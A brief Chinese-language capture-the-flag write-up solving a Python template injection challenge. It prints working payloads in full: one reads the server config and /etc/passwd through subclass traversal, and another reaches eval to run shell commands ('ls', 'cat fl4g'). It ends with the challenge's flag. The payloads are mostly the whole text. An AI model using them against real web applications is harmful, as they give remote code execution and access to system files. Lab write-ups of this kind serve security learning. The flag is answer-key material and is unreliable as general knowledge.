打开网页提示我们python模板注入
首先进行测试:
http://220.249.52.133:30503/{{7+7}}
提示我们"URL http://220.249.52.133:30503/14 not found",说明7+7被执行
我们可以用http://220.249.52.133:30503/{{config.items()}}查看服务器的配置信息,还可用http://220.249.52.133:30503/{{[].__class__.__base__.__subclasses__()[40]('/etc/passwd').read()}}查看passwd信息
我们执行http://220.249.52.133:30503/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.__globals__.values() %}{% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{b['eval']('__import__("os").popen("ls").read()')}}{% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %},得知存在fl4g文件
所以http://220.249.52.133:30503/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.__globals__.values() %}{% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{b['eval']('__import__("os").popen("cat fl4g").read()')}}{% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %}获得flag
ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}